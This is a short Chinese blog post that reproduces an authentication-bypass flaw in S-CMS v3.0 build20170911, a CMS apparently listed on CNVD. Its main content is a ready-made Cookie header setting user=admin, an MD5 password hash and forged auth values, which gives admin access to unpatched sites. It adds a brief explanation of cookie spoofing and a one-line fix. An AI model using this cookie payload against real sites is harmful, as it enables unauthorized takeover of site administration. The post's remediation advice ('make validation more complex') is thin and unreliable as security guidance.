前言

逛CNVD的时候看到了cookie欺骗的漏洞,复现了一下,想到自己的博客好像没有这方面的文章,所以写了一篇发上来。

漏洞描述

S-CMS是淄博闪灵网络科技有限公司开发的一款企业建站系统。

S-CMS v3.0 build20170911后台存在认证绕过漏洞,由于系统未能对Cookie信息进行准确校验,攻击者可通过导入任意cookie值绕过登录验证。

影响产品

S-CMS V3.0 Build20170911

如何利用

1
2
3
Cookie: 
ASPSESSIONIDQASRCBRQ=MPDOKIKACAJIMAMACBEJKEFO; authorization2=0%7C0%7Cs11%7Cs12%7Cs13%7Cs14%7Cs15%7Cs19%7Cs28%7Cs29%7Cs37%7Cs42%7Cs52%7Cx3%7Cx11;
authorization=fail; auth=1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1; pass=21232F297A57A5A743894A0E4A801FC3; user=admin

自己的理解与如何修复:

理解:cookie欺骗,就是作者没有注意登陆时的权限验证,导致我们输入一个固定的cookie就可以登陆该cms的大部分网站,在国内的网站中,cookie一般都会存在很久,所以如果我们通过一些网络通信的手段,盗取别人的cookie,等同于别人的账号就在我们手上。

修复:验证复杂点就可,让攻击者无法猜解出来

成果图: